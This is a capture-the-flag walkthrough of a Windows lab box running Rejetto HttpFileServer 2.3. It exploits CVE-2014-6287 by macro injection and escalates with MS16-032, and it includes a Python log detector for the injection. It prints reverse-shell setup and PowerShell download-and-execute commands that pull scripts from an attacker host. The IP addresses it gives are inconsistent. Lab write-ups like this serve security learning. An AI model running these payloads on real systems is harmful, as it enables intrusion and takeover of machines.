This is a Windows OS. IP: 10.10.10.2
Enumeration
This write-up does not use Kali Linux; I chose to root the box the manual way. The IP for this box is 10.10.10.8. I chose to run nmap, but you can run other tools such as Sparta, masscan and unicornscan. The nmap scan reveals HttpFileServer httpd 2.3 running on port 80. Browsing to the website and pressing Ctrl+U to view the page source confirms the same.


Exploitation
Searchsploit reveals there is an exploit for it: searchsploit rejetto HttpFileServer 2.3. The exploit is also found on exploit-db or mitre.org and has CVE-2014-6287, which states that "remote attackers can execute arbitrary commands via sequence in a search action". The Rejetto wiki gives examples of commands we can inject, e.g. {.exec | notepad }.

Next we do null byte injection via Burp to test this. Send the request to Repeater and test the injected command by having it ping your IP. Set up tcpdump on your interface to verify that the ping reaches you (tcpdump -i tun0 or eth0) and click Go in Repeater; the request should succeed and show that you have command execution, as indicated by the HTTP status code 200 OK.
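As an added example (not part of the original write-up), the following Python scans web-server access-log lines for the search-parameter injection pattern CVE-2014-6287 describes (a null byte followed by an HFS {.exec|...} macro), so a defender can spot it in HFS logs. The log format and the sample lines are constructed for illustration; the page gives neither.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache-style format, assumed here for
# illustration; the page gives no log format). Two of the four requests carry
# the HFS 2.3 search-parameter injection described in CVE-2014-6287.
SAMPLE_LOG = """\
10.10.14.20 - - [01/Jan/2020:10:00:00 +0000] "GET /?search=%00%7B.exec%7Cnotepad.%7D HTTP/1.1" 200 512
10.10.14.21 - - [01/Jan/2020:10:00:01 +0000] "GET /?search=report.pdf HTTP/1.1" 200 1024
10.10.14.22 - - [01/Jan/2020:10:00:02 +0000] "GET /?search=%00{.exec|ping+10.10.14.20.} HTTP/1.1" 200 512
10.10.14.23 - - [01/Jan/2020:10:00:03 +0000] "GET /files/notes.txt HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
EXEC_MACRO_RE = re.compile(r"\{\.\s*exec\s*\|", re.IGNORECASE)


def inspect_request(target):
    """Return the indicator names found in one request target (path + query)."""
    # Decode twice: the injection travels URL-encoded, and a filter that decodes
    # only once can be bypassed by double encoding.
    decoded = unquote(unquote(target))
    indicators = []
    if "\x00" in decoded:               # the %00 that truncates HFS's search string
        indicators.append("null-byte")
    if "{." in decoded:                 # opener of an HFS template macro
        indicators.append("hfs-macro")
    if EXEC_MACRO_RE.search(decoded):   # the {.exec|...} macro used for command execution
        indicators.append("hfs-exec-macro")
    return indicators


def scan_log(text):
    """Parse each log line and report requests carrying any indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                    # skip lines not in the expected format
        indicators = inspect_request(m.group("target"))
        if indicators:
            findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                             "target": m.group("target"), "indicators": indicators})
    return findings
```

A 200 response on such a request is what the write-up treats as confirmation of execution, so alerting on the indicators together with the status code gives a useful first triage signal.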


The next step is to get a reverse shell. We are going to use nishang, which is on GitHub at samratashok/nishang and can be git cloned. I am going to use Invoke-PowerShellTcp.ps1 from nishang. Take the example in the script (PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444), modify it with your IP and copy it to the bottom of the script. We then run python -m SimpleHTTPServer to serve everything over HTTP from our local box.


Next we insert the following command in Burp in place of ping. Bear in mind that this is a 64-bit machine; see below for the paths to 32-bit and 64-bit binaries and libraries on 64-bit Windows. Set your listener running as well (nc -lvnp 1337).
c:\Windows\System32 (32 bit binaries)
c:\Windows\Syswow64 (32 bit libraries)
C:\Windows\SysNative (64 bit binaries)

When we execute the PowerShell command we DO NOT get a shell. The mistake we made was not URL encoding the payload, which Burp does with Ctrl+U. After encoding we get a PowerShell command prompt.

We run systeminfo to see hotfixes and the OS version (2012 R2). We then load Sherlock.ps1 from GitHub to check for vulnerabilities using the command: IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20:8000/Sherlock.ps1'). Don't forget to add the function call Find-AllVulns at the bottom of the script.

Sherlock shows that the Windows OS is vulnerable to MS16-032. An exploit for it can also be found in PowerShell Empire, where it has been edited to include custom commands. Copy the example provided in the script and update it with your IP and port.

Rename Invoke-PowerShellTcp.ps1 to shell.ps1 and set up another listener on port 1338; this port should match the one in shell.ps1. We do the renaming and use a new port since we are already listening on 1337 with Invoke-PowerShellTcp.ps1.
Use the command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.20:8000/MS16032.ps1')" to load our privesc exploit into our shell. whoami on the 1338 listener reports NT AUTHORITY\SYSTEM!!!!!

